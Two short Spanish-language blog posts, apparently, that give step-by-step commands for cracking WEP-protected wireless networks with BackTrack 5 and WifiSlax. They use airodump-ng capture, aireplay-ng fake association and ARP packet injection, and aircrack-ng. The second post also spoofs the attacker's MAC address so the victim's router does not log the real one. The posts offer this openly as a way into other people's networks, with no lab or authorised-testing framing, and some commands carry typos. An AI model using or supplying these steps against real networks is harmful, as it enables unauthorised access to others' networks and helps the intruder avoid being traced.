• back track 5

     

     

     

     

     

     

     

     

    Los pasos para crackear una red inalambrica con cifrado WEP con la distribucion de Linux denominada BackTrack 5 son los siguientes:

    airmon-ng start wlan0

    airodump-ng mon0

    airodump-ng -w “nombre_de_la_red_ a_crackear” –bssid “MAC_router_a_crackear” — channel “canal_red_a_crackear”  mon0

    Abrimos otra shell para poder lanzar los siguientes comandos:

    aireplay-ng -1 -a “MAC_router_a_crackear” -h “MAC_nuestra_tarjeta_de_red” -e “nombre_de_la_red_a_crackear” mon0 –> asociacion falsa

    aireplay-ng -3 -b “MAC_router_a_crackear” -h “MAC_nuestra_tarjeta_de_red” mon0 –> inyeccion de paquetes

    Llegados a este punto es conveniente desde otro PC intentar conectar a la red a crackear y meter la contraseña 1122334455 para que empiezen a subir los #data.

    Cuando los #data llegan a 40 000 ya se puede crackear la red mediante el siguiente comando:

    aircrack -ng fichero.cap (El nombre del fichero suele ser el nombre de la red seguido de -01.cap)

     

    Esta informacion a sido proporcionada por Jairo, para mas informacion sobre el autor consultar http://www.jairoespinosa.net/

    Tags: , , ,

  • WifiSlax

    Resumen rapido de los pasos a seguir:

    1. Wifislax > Asistencia chipset > Asistencia Intel Pro Wireless > Recargar modulo ipw 2200 inyeccion.
    2. iwconfig –> Para ver interfaces (ethx).
    3. airodump-ng -w captura rtap0 –> Se activa el sniffer o capturador de paquetes.

    Se abre una nueva consola o shell:

    1. kmdr-executor /usr/share/wifislax/macchanger-conf.kmdr –> Cambiamos la MAC de nuestro PC para que no se registre en el router de la victima nuestra verdadera MAC.
    2. iwconfig ethx essid “ESSID_A_CRACKEAR” channel z key 66666 –> Asociacion falsa a la red que queremos crackear (x y z se deben cambiar por los valores pertinentes).
    3. aireplay-ng -3 -x 1024 – b MAC_ROUTER_CRACKEAR -h 00:11:22:33:44:55 -i rtap ethx –> inyeccion de paquetes para capturar IVs
    4. Cuando los ARP Request esta en mas o menos 40 000, se para la inyeccion con CTRL + D.
    5. Se para el sniffer con CTRL + D (la 1ª shell).
    6. Se procede a crackear la contraseña a partir de la captura mediante aircrack-ng – z captura.cap.

    Tags: , , ,